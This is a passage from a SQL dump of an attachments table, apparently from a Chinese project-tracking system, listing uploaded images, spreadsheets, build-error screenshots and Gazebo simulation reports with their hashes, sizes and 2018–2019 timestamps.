15:35:11',NULL,'2018/12',1,1,NULL,NULL,1,NULL,1,0,NULL),(404,NULL,'Memo','f23c8d6e9ec78233919c59ff10bccd30','181226153741_f23c8d6e9ec78233919c59ff10bccd30',56000,'image/jpeg','a6de7ba749522f137c74d2934d8299ea',28,1,'2018-12-26 15:37:41',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(405,NULL,'Memo','bb00c060f3aec00330922f6bb04ab68c','181226153806_bb00c060f3aec00330922f6bb04ab68c',43870,'image/jpeg','db03246aa1c28117e6b05cc97d4922a8',27,1,'2018-12-26 15:38:06',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(406,NULL,'Memo','1d7467f410370ef4900a141b792f7840','181226153847_1d7467f410370ef4900a141b792f7840',77382,'image/jpeg','5aab1363d1f83b9d6d228bd178380fec',29,1,'2018-12-26 15:38:47',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(407,NULL,'Memo','b7a42d5eff299709a6a51fd7107bf546','181226153929_b7a42d5eff299709a6a51fd7107bf546',35202,'image/jpeg','aa5d0c9cb6bac3adb1de786c834f474b',28,1,'2018-12-26 15:39:29',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(408,NULL,'Memo','647dfd63183c522d3a5ef87cf231054c','181226154006_647dfd63183c522d3a5ef87cf231054c',71939,'image/jpeg','5307801b287955914efb644b69c44594',28,1,'2018-12-26 15:40:06',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(409,NULL,'Memo','1bccb465bc809b5cda06bd6019ebc8f3','181226154148_1bccb465bc809b5cda06bd6019ebc8f3',67086,'image/jpeg','32c903f0404d4cfbf1b11dc3bd991d46',26,1,'2018-12-26 15:41:48',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(410,NULL,'Memo','a871663212806a064f5c34398bb3992d','181226154224_a871663212806a064f5c34398bb3992d',105986,'image/jpeg','fce0745755ea961c76ee6e074894f8d7',27,1,'2018-12-26 15:42:24',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(411,NULL,'Memo','b00a3d2a2d631094647679560426d83e','181226154300_b00a3d2a2d631094647679560426d83e',77865,'image/jpeg','9fabb539b851e01a0aa468d0e731e3dc',32,1,'2018-12-26 15:43:00',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(412,NULL,'Memo','612e985270e90bece19e140c7f7ae732','181226154335_612e985270e90bece19e140c7f7ae732',35218,'image/jpeg','46d597bd5ec49aae5b412084de8055fb',28,1,'2018-12-26 15:43:35',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(413,NULL,'Memo','c880044c016d86a188d8fd25b5949166','181226154425_c880044c016d86a188d8fd25b5949166',44055,'image/jpeg','183bf0c2be001b51026bb2f5c3fa64ed',28,1,'2018-12-26 15:44:25',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(414,NULL,'Memo','cae8c96c39abe909103fb8bc512e5b53','181226154509_cae8c96c39abe909103fb8bc512e5b53',32125,'image/jpeg','acf27f718ed2f1a086797e0c96e4b555',28,1,'2018-12-26 15:45:09',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(415,NULL,'Memo','4af2f28a866782655d599df50117bd3d','181226154521_4af2f28a866782655d599df50117bd3d',63890,'image/jpeg','78a0d7ecd4d752986e512e98a8648678',28,1,'2018-12-26 15:45:21',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(416,168,'Memo','微信图片_20181226153729.jpg','181226154545_63fb6ac58d4ebff099177189e327a346.jpg',56000,'image/jpeg','a6de7ba749522f137c74d2934d8299ea',1468,1,'2018-12-26 15:45:45',NULL,'2018/12',1,1,NULL,NULL,1,NULL,1,0,NULL),(417,NULL,'Memo','e50f4267354014f4019e15b04d6e9d42','181226154904_e50f4267354014f4019e15b04d6e9d42',87695,'image/jpeg','e12267016a9b9085357b705f9bbf6c27',35,1,'2018-12-26 15:49:04',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(418,NULL,'Memo','8cda52f81ca83b0fa461c979b00043cd','181226154925_8cda52f81ca83b0fa461c979b00043cd',86806,'image/jpeg','695dcefcf27b42b520d6e127a21b195f',35,1,'2018-12-26 15:49:25',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(420,NULL,'Memo','3e9183fb4c1295242cbc0388c3ad5054','181226155326_3e9183fb4c1295242cbc0388c3ad5054',227246,'image/jpeg','5e1743805c65b7419baef90b669b9fe3',25,1,'2018-12-26 15:53:26',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(422,NULL,'Memo','631b9fb9745c79c99d587260ac1ffbd1','190111173046_631b9fb9745c79c99d587260ac1ffbd1',24695,'image/jpeg','806e58aca50d94dc830f20f1c736102f',5,1,'2019-01-11 17:30:46',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(423,NULL,'Memo','50e627a9b4539ca95772661b99026937','190111173128_50e627a9b4539ca95772661b99026937',15046,'image/jpeg','de8eeebceb00b2995feb6a3145771672',5,1,'2019-01-11 17:31:28',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(424,NULL,'Memo','60786714191f892d446ca38c02507794','190111173317_60786714191f892d446ca38c02507794',14816,'image/jpeg','983df1cfd44a094d368065cdd9a8e972',5,1,'2019-01-11 17:33:17',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(425,NULL,'Memo','e64ca4244733fadab1e2650f44def6bc','190111173436_e64ca4244733fadab1e2650f44def6bc',18320,'image/jpeg','58ef59dda95059316424eb00de7291ec',5,1,'2019-01-11 17:34:36',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(426,NULL,'Memo','e3259425048feb33c425dd0e1311493b','190111173544_e3259425048feb33c425dd0e1311493b',101606,'image/jpeg','415d1c9912a1d4a63fa56ec2878e5640',5,1,'2019-01-11 17:35:44',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(427,NULL,'Memo','e44de3f4529c7b474b4d9daec572033b','190111173646_e44de3f4529c7b474b4d9daec572033b',70300,'image/jpeg','cd3160fdf57f375f4b6350b8fd94ef1e',5,1,'2019-01-11 17:36:46',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(428,NULL,'Memo','4ce7911df3a34f6eb5e131e67ac5cd56','190111173720_4ce7911df3a34f6eb5e131e67ac5cd56',88705,'image/jpeg','25d34a0d7c86a53338e3f328fe6d0f09',5,1,'2019-01-11 17:37:20',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(429,NULL,'Memo','53d75e109067c554f83727977d821901','190111173757_53d75e109067c554f83727977d821901',81939,'image/jpeg','9bdf29bd4b7cf9c931f338d5cf02708c',5,1,'2019-01-11 17:37:57',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(430,NULL,'Memo','e2a0b75d25e8e68b670b1d46937fc51c','190111173830_e2a0b75d25e8e68b670b1d46937fc51c',80172,'image/jpeg','137896e9dcbf8e34887c0cf55b3182e1',5,1,'2019-01-11 17:38:30',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(431,NULL,'Memo','205dcc71c3c07d755c4912108bfa3b08','',0,'','',0,1,'2019-01-11 17:38:51',NULL,NULL,1,1,NULL,NULL,1,NULL,0,0,NULL),(432,NULL,'Memo','40e949b2e5396a7c595697f75feff32b','190111173901_40e949b2e5396a7c595697f75feff32b',82068,'image/jpeg','047137694eb145fb33de87c715b96a25',1,1,'2019-01-11 17:39:01',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(433,NULL,'Memo','0af93152d8f3228d4377c017fa610bf3','190111174219_0af93152d8f3228d4377c017fa610bf3',92479,'image/jpeg','39835fb9d08d3b6fff9709f39101b9e3',5,1,'2019-01-11 17:42:19',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(435,NULL,'Memo','ffdfcf290681e44ed77b95acb8601859','190111174927_ffdfcf290681e44ed77b95acb8601859',26165,'image/jpeg','8c2403f1af3cf3c3b17ed4cc7a310931',5,1,'2019-01-11 17:49:27',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(436,NULL,'Memo','be4ce816c1dd4a6f6657b0db495aa8dd','190111175007_be4ce816c1dd4a6f6657b0db495aa8dd',39037,'image/jpeg','1281f90cdd052284df2fec094cc176b6',5,1,'2019-01-11 17:50:07',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(437,NULL,'Memo','b26369600c104ffb7eea9630113adf2e','190111175046_b26369600c104ffb7eea9630113adf2e',59995,'image/jpeg','f30d0938dd689d0ea559c2a94958e086',5,1,'2019-01-11 17:50:46',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(438,NULL,'Memo','68367cbbffe143a840601132a7931bce','190111175234_68367cbbffe143a840601132a7931bce',37958,'image/jpeg','552dcf6039d227b5bafe7b5ab82ffd91',5,1,'2019-01-11 17:52:34',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(439,NULL,'Memo','e0d5ec837d1c12977e03ac9e31482c0e','190111175300_e0d5ec837d1c12977e03ac9e31482c0e',73355,'image/jpeg','3bb559b36df07dede8b4455b25181ae2',5,1,'2019-01-11 17:53:00',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(440,NULL,'Memo','39f04be49fafde8c7177421b9eb1b004','190111175342_39f04be49fafde8c7177421b9eb1b004',35469,'image/jpeg','89f6ce03ef2be770f839bfd7b594b58e',5,1,'2019-01-11 17:53:42',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(441,NULL,'Memo','6ff32eca5c27af2f11a1199ba6c51e62','190111175411_6ff32eca5c27af2f11a1199ba6c51e62',25056,'image/jpeg','23be6bf350c75c70dc6347f788bdcc3c',5,1,'2019-01-11 17:54:11',NULL,'2019/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(444,30,'Issue','c807f426ca3ead5597f74b235f83f36c','190115150826_c807f426ca3ead5597f74b235f83f36c',34964,NULL,'820fcae28b300dcecfb8ae396d7e266a',0,19,'2019-01-15 15:08:26','','2019/01',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(445,81,'Project','debug.log','190115150900_debug.log',11907,NULL,'36b4b821b03ef19acc5d4d92089070df',0,19,'2019-01-15 15:09:00','','2019/01',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(449,31,'Issue','8.jpg','190121101723_8.jpg',27169,NULL,'cfedd9a95160e52062b04e1cb228a7f1',0,19,'2019-01-21 10:17:23','','2019/01',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(454,NULL,'IssueImage','6c36145f71701714f51532a81d49e2ac','190417095958_6c36145f71701714f51532a81d49e2ac',183605,'image/png','92a987ab2c2e1ad69135e9e8ad4dd60c',0,43,'2019-04-17 09:59:58',NULL,'2019/04',1,1,NULL,NULL,1,NULL,0,0,NULL),(455,NULL,NULL,'gazebo.png','190417100044_gazebo.png',183605,'','92a987ab2c2e1ad69135e9e8ad4dd60c',0,43,'2019-04-17 10:00:44',NULL,'2019/04',1,1,NULL,NULL,1,NULL,0,0,NULL),(456,NULL,'IssueImage','a0ddeda9d3b89cdb85a75913c8213f8b','190417100229_a0ddeda9d3b89cdb85a75913c8213f8b',1248416,'image/png','651644950bc07b37333a53c1c4ea2b1a',0,43,'2019-04-17 10:02:29',NULL,'2019/04',1,1,NULL,NULL,1,NULL,0,0,NULL),(457,44,'Issue','问题汇总(4-17).doc','190417100621_a6d6490e9b6b65f5fccb8ed37c73e034.doc',386560,NULL,'02af34ffa5c8c077a330de3e705f4e32',3,43,'2019-04-17 10:06:21','','2019/04',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(464,44,'Issue','记录(4-17).tar.gz','190417162115_646f94759f95e99f662e9f5fb9be23d9.gz',60179,NULL,'c3c6feccc8f322e7cb7ceedea5475282',1,43,'2019-04-17 16:21:15','','2019/04',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(465,44,'Issue','测试(4-17).txt','190417173612_031e7fc6461229d5b35aad8d8cee831f.txt',12893,NULL,'a3d2c6bc65b01b2b69c8df71466f2ee4',1,43,'2019-04-17 17:36:12','','2019/04',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(466,130,'Project','Gazebo_exercise并行仿真性能分析报告.pdf','190417232659_e55e9715ca5a7c796c56d652f8e1d641.pdf',800755,NULL,'7c5218a51c6e5f4ff0ba4682b29fde00',4,26,'2019-04-17 23:26:59','分析了采用Gazebo_exercise版本进行仿真时,并行效率不高的瓶颈,给出了关键代码位置。','2019/04',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(470,45,'Issue','aircraft_forces_and_moments.cpp','190418171336_aircraft_forces_and_moments.cpp',12924,NULL,'840962d18b21a24198a48ff8dff13928',1,26,'2019-04-18 17:13:36','','2019/04',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(471,45,'Issue','aircraft_forces_and_moments.h','190418171336_aircraft_forces_and_moments.h',3664,NULL,'5c7f8ce3351367545d5a2ed9a1e9d68f',0,26,'2019-04-18 17:13:36','','2019/04',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(472,NULL,'IssueImage','ddc01d8d66738f5dd340c319d58530c1','190418171552_ddc01d8d66738f5dd340c319d58530c1',453470,'image/png','e0e086ea54db30747d4ecc1afdda2ef3',0,26,'2019-04-18 17:15:52',NULL,'2019/04',1,1,NULL,NULL,1,NULL,0,0,NULL),(473,NULL,'IssueImage','542ae6b54391423c96a0c67b8bd7f6ac','190418171920_542ae6b54391423c96a0c67b8bd7f6ac',453470,'image/png','e0e086ea54db30747d4ecc1afdda2ef3',0,26,'2019-04-18 17:19:20',NULL,'2019/04',1,1,NULL,NULL,1,NULL,0,0,NULL),(474,NULL,'IssueImage','0523b721e51e455a382978e5857b2dd6','190418174429_0523b721e51e455a382978e5857b2dd6',453470,'image/png','e0e086ea54db30747d4ecc1afdda2ef3',0,26,'2019-04-18 17:44:29',NULL,'2019/04',1,1,NULL,NULL,1,NULL,0,0,NULL),(475,47,'Issue','Gazebo-exercise编译时异常截图.png','190418175245_bc9819e9033caa1a9dae209661347e49.png',453470,NULL,'e0e086ea54db30747d4ecc1afdda2ef3',4,26,'2019-04-18 17:52:45','','2019/04',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(476,NULL,'IssueImage','548d5999595d6b9f79697739f591c43c','190429111337_548d5999595d6b9f79697739f591c43c',243349,'image/png','e8a565fcd30c6f1be99a5eef1e05d585',0,26,'2019-04-29 11:13:37',NULL,'2019/04',1,1,NULL,NULL,1,NULL,0,0,NULL),(477,NULL,'IssueImage','3b183dcc771cd7dfa3e95e1255a3fe3c','190429111758_3b183dcc771cd7dfa3e95e1255a3fe3c',243349,'image/png','e8a565fcd30c6f1be99a5eef1e05d585',0,26,'2019-04-29 11:17:58',NULL,'2019/04',1,1,NULL,NULL,1,NULL,0,0,NULL),(478,NULL,'IssueImage','2e48958f0274700083eed43b0ede0bb7','190429111831_2e48958f0274700083eed43b0ede0bb7',419303,'image/png','de5548d0685859aa7c1b429f1ee8cbc5',0,26,'2019-04-29 11:18:31',NULL,'2019/04',1,1,NULL,NULL,1,NULL,0,0,NULL),(479,48,'Issue','complieError.png','190429111940_complieError.png',243349,NULL,'e8a565fcd30c6f1be99a5eef1e05d585',3,26,'2019-04-29 11:19:40','','2019/04',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(480,49,'Issue','boostError.png','190429113007_boostError.png',274396,NULL,'b598bf619d52a3303503136f229f56c6',2,26,'2019-04-29 11:30:07','','2019/04',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(481,49,'Issue','boost.zip','190429113243_boost.zip',16072294,NULL,'edb93ff49d8212641eed9da3f15a0705',5,26,'2019-04-29 11:32:43','','2019/04',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(482,50,'Issue','libGl_error.png','190429114228_libGl_error.png',389704,NULL,'2e336ebbc63935ec5c4e5a7fffb0b664',2,26,'2019-04-29 11:42:28','','2019/04',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(483,50,'Issue','英伟达独显驱动安装教程.doc','190429132217_17d7aaeb5cfa90cd7b90edce60c6b47c.doc',335360,NULL,'edd7115f62124c193093d761e9973369',1,26,'2019-04-29 13:22:17','','2019/04',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(484,1,'Paper','创客任务列表_2019-07-26_21-00.xlsx','190806095611_42fcd1e829c5d386feec150ade53974a.xlsx',7426,'','673ac768775c815b30c0e0ec179dec9f',1,47,'2019-08-06 09:56:11',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(485,1,'Paper','创客任务列表_2019-07-27_08-44.xlsx','190806095615_1f9c45ae567b6150b697161157a6916d.xlsx',7437,'','a29686a605a48ad3ac21087560e3ad93',1,47,'2019-08-06 09:56:15',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(486,1,'Paper','1564542083439.pdf','190806095621_1564542083439.pdf',379723,'','1a3a7cb1605ade238619670bc8f322e4',2,47,'2019-08-06 09:56:21',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(487,NULL,NULL,'7.png','190807100920_7.png',145745,'image/png','b2da4f69814a6c1c4a510fafc988cb44',0,48,'2019-08-07 10:09:20',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(488,7,'Paper','c语言ppt课件.ppt','190807150639_d5ddedf2b92dd2551b81f35809fcf151.ppt',279552,'','b2fb0f4b92e3d8679a17e06119fa7216',0,51,'2019-08-07 15:06:39',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(489,8,'Paper','语法树.jpg','190807155055_6039ac0eed654a5d6116a9cd5184d9f7.jpg',93448,'','74bf4eaab31669703ed06d180e4c6d70',0,49,'2019-08-07 15:50:55',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(490,9,'Paper','favicon.ico.white.ico','190807155310_favicon.ico.white.ico',89200,'','5a8838ffc01c0b29e34fe70efd63a830',0,52,'2019-08-07 15:53:10',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(491,10,'Paper','T1xFK4BbZC1RCvBVdK.jpg','190807155827_T1xFK4BbZC1RCvBVdK.jpg',5325,'','5a31a3698ba2e10298caa438b4f314b2',0,49,'2019-08-07 15:58:27',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(493,11,'Paper','tasks.xlsx','190807161404_tasks.xlsx',8923,'','90f9397a27ca2280194a9d463e52a11c',0,50,'2019-08-07 16:14:04',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(494,13,'Paper','tasks.xlsx','190807164501_tasks.xlsx',8923,'','90f9397a27ca2280194a9d463e52a11c',0,50,'2019-08-07 16:45:01',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(495,14,'Paper','T1U.ZPB7LA1RCvBVdK.jpg','190807165001_T1U.ZPB7LA1RCvBVdK.jpg',6320,'','4eab95e7d85fe0957808c2fa7a0b43e6',0,46,'2019-08-07 16:50:01',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(496,51,'Issue','T1U.ZPB7LA1RCvBVdK.jpg','190808084800_T1U.ZPB7LA1RCvBVdK.jpg',6320,NULL,'4eab95e7d85fe0957808c2fa7a0b43e6',0,46,'2019-08-08 08:48:00','','2019/08',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(498,NULL,NULL,'tasks.xlsx','190809085957_tasks.xlsx',8923,'','90f9397a27ca2280194a9d463e52a11c',0,49,'2019-08-09 08:59:57',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(504,NULL,NULL,'tasks.xlsx','190813084500_tasks.xlsx',8923,'','90f9397a27ca2280194a9d463e52a11c',0,50,'2019-08-13 08:45:00',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(505,8,'Task','tasks.xlsx','190813085505_tasks.xlsx',8923,'','90f9397a27ca2280194a9d463e52a11c',2,50,'2019-08-13 08:55:05',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(506,19,'Paper','tasks.xlsx','190813085614_tasks.xlsx',8923,'','90f9397a27ca2280194a9d463e52a11c',1,49,'2019-08-13 08:56:14',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(507,22,'Paper','01200000029787134390871309955_s.jpg','190813105350_01200000029787134390871309955_s.jpg',15311,'','fc5543ae4284b654bb074e65f908d712',0,53,'2019-08-13 10:53:50',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(508,23,'Paper','01200000029787134390871309955_s.jpg','190813113156_01200000029787134390871309955_s.jpg',15311,'','fc5543ae4284b654bb074e65f908d712',2,53,'2019-08-13 11:31:56',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(509,24,'Paper','高效碰撞检测算法.txt','190813124250_c78b9be664c7e48b5972b6f0333b626f.txt',24,'','ea411331dbbc81e88259fab5e149ebb6',1,52,'2019-08-13 12:42:50',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(510,25,'Paper','T1U.ZPB7LA1RCvBVdK.jpg','190813125155_T1U.ZPB7LA1RCvBVdK.jpg',6320,'','4eab95e7d85fe0957808c2fa7a0b43e6',0,53,'2019-08-13 12:51:55',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(511,25,'Paper','语法树.jpg','190813125201_6039ac0eed654a5d6116a9cd5184d9f7.jpg',93448,'','74bf4eaab31669703ed06d180e4c6d70',0,53,'2019-08-13 12:52:01',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(512,26,'Paper','算法投稿.zip','190813125546_945ff48f505c6629063ac8918592a4e6.zip',22,'','76cdb2bad9582d23c1f6f4d868218d6c',7,50,'2019-08-13 12:55:46',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(513,28,'Paper','banner2.jpeg','190813144955_banner2.jpeg',5943,'','7e19d3ea53eb58a45953dce799541bf5',1,52,'2019-08-13 14:49:55',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(514,29,'Paper','T1xFK4BbZC1RCvBVdK.jpg','190813152757_T1xFK4BbZC1RCvBVdK.jpg',5325,'','5a31a3698ba2e10298caa438b4f314b2',1,49,'2019-08-13 15:27:57',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(515,30,'Paper','T1xFK4BbZC1RCvBVdK.jpg','190813161442_T1xFK4BbZC1RCvBVdK.jpg',5325,'','5a31a3698ba2e10298caa438b4f314b2',2,49,'2019-08-13 16:14:42',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(517,31,'Paper','T1xFK4BbZC1RCvBVdK.jpg','190813161600_T1xFK4BbZC1RCvBVdK.jpg',5325,'','5a31a3698ba2e10298caa438b4f314b2',0,53,'2019-08-13 16:16:00',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(518,53,'Issue','7984 (1).jpg','190813163154_82cad775caf4fd73df8175c05a54f69a.jpg',32300,NULL,'dde8faf7ccb1defc5f95cd95c2c5f883',2,50,'2019-08-13 16:31:54','','2019/08',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(521,54,'Issue','bug_创客空间03.png','190814081755_2ec91abfd6efc93baf8efa04f45cd2b9.png',320372,NULL,'f2f53f0d8a85057583e1af0ac1e23e2f',0,46,'2019-08-14 08:17:55','','2019/08',NULL,0,NULL,NULL,1,NULL,0,0,NULL),(522,NULL,NULL,'创客任务列表_2019-07-26_18-47.xlsx','190814085102_98412919caf9c0f249d01a1164c750c0.xlsx',3747,'','9318fff942122c8b80c1cbc752fe3376',0,50,'2019-08-14 08:51:02',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(523,1,'TaskTemplate','创客任务列表_2019-07-26_20-53.xlsx','190814095511_43ae87b84c588e4b648c5fa450d852cb.xlsx',7410,'','cb3b20dfa802aba59c5d53d6e10d5984',6,50,'2019-08-14 09:55:11',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(524,4,'Notice','T1xFK4BbZC1RCvBVdK.jpg','190814151153_T1xFK4BbZC1RCvBVdK.jpg',5325,'','5a31a3698ba2e10298caa438b4f314b2',2,46,'2019-08-14 15:11:53',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(530,8,'Competition','5c5d4dc9e11cf1907aa179e64cd14c98.jpg','190814184246_5c5d4dc9e11cf1907aa179e64cd14c98.jpg',449596,'','c333a510dd6dce8239f2bb36d3a82244',33,50,'2019-08-14 18:42:46',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(531,8,'Competition','b4cb15cd3eb95716f1caa464adc03d83.jpg','190814184246_b4cb15cd3eb95716f1caa464adc03d83.jpg',276202,'','f83da56dd243caad9ef3cfaa29e9d7fc',34,50,'2019-08-14 18:42:46',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(532,8,'Competition','84fa0126e7a469740dc007702b5a9bf4.jpg','190814184246_84fa0126e7a469740dc007702b5a9bf4.jpg',114031,'','0300a8b1422374c34794d8d31cfd8e04',34,50,'2019-08-14 18:42:46',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(533,8,'Competition','ebfa47be8fbd792d54921d71ef7bf2b1.jpg','190814184246_ebfa47be8fbd792d54921d71ef7bf2b1.jpg',656367,'','598518a8e1d3214b57f01d9be548b164',33,50,'2019-08-14 18:42:46',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(534,8,'Competition','7d65005f7b34ed03eb6d5cc356282428.jpg','190814184246_7d65005f7b34ed03eb6d5cc356282428.jpg',390165,'','a4a7464c48a56fbe74c2a627a984a2d4',33,50,'2019-08-14 18:42:46',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(535,230,'Memo','timg.jpg','190815150055_timg.jpg',24417,'image/jpeg','4e9b21bb54f993961d9ee02a73fd58d1',712,50,'2019-08-15 15:00:55',NULL,'2019/08',1,1,NULL,NULL,1,NULL,1,0,NULL),(536,NULL,'Memo','d2df7b0d1b8c152ae0591b3eb128becc','190815151513_d2df7b0d1b8c152ae0591b3eb128becc',232748,'image/png','7684a192b7ad9f5eef5af98bdb09d6f9',1,50,'2019-08-15 15:15:13',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(537,NULL,'Memo','daeb1529d7f906deba9f88cdde3d6d35','190815151559_daeb1529d7f906deba9f88cdde3d6d35',539034,'image/png','52dea6378380b48335b4c1588f8ca0e9',1,50,'2019-08-15 15:15:59',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(539,232,'Memo','u=3681033653,1358696320&fm=26&gp=0.jpg','190815152532_462ef085b4355ba8a9bc389d326a770e.jpg',30236,'image/jpeg','b751cf3bca86dc99a0006e837acab947',720,50,'2019-08-15 15:25:32',NULL,'2019/08',1,1,NULL,NULL,1,NULL,1,0,NULL),(540,NULL,'Memo','5696261842b293f9a440b8872eb93fb0','190815153310_5696261842b293f9a440b8872eb93fb0',4770796,'image/png','4c849c2e3df857afef4c080528a6e47d',7,50,'2019-08-15 15:33:10',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(541,233,'Memo','timg (1).jpg','190815153318_a0b762859636f4ae43b694d4edf10b2e.jpg',11982,'image/jpeg','14d5a2b06e8c968e49119effca4a9925',687,50,'2019-08-15 15:33:18',NULL,'2019/08',1,1,NULL,NULL,1,NULL,1,0,NULL),(542,NULL,'Memo','e8c4b5f3dda9e7b33d9bf0f825aaf0a2','190815154004_e8c4b5f3dda9e7b33d9bf0f825aaf0a2',37028,'image/jpeg','4c6b2c85e865ae5eb454f2bb7f57adeb',3,50,'2019-08-15 15:40:04',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(543,NULL,'Memo','a791d7cf43b88e40af7a6a3f2255d622','190815154050_a791d7cf43b88e40af7a6a3f2255d622',1277077,'image/jpeg','959bded79381aca7c524031cbacf559e',3,50,'2019-08-15 15:40:50',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(544,NULL,'Memo','e8435fd66389c4809c1caf99f5907c17','190815154216_e8435fd66389c4809c1caf99f5907c17',287477,'image/jpeg','7ea8ea99f0d011d9345ff843f9a5d1dd',2,50,'2019-08-15 15:42:16',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(545,NULL,'Memo','d930ea676f6a925df84ef6b26bd1b8c5','190815154257_d930ea676f6a925df84ef6b26bd1b8c5',149043,'image/jpeg','ba62839ae6b7d8235a6d274c24b953ef',3,50,'2019-08-15 15:42:57',NULL,'2019/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(546,234,'Memo','u=3502448212,667583139&fm=26&gp=0.jpg','190815154442_715381b6aa2b7044b9ea5274bff60eb5.jpg',55091,'image/jpeg','42e74fd37581b9f0e3c2ebd934670b26',671,50,'2019-08-15 15:44:42',NULL,'2019/08',1,1,NULL,NULL,1,NULL,1,0,NULL),(547,NULL,'Memo','9e958d4d69b04c088e0c61a60142698c','190815155953_9e958d4d69b04c088e0c61a60142698c',19585,'image/jpeg','45ea5a4f2aefebb19f741cd2f4b6acd0',7,50,'2019-08-15 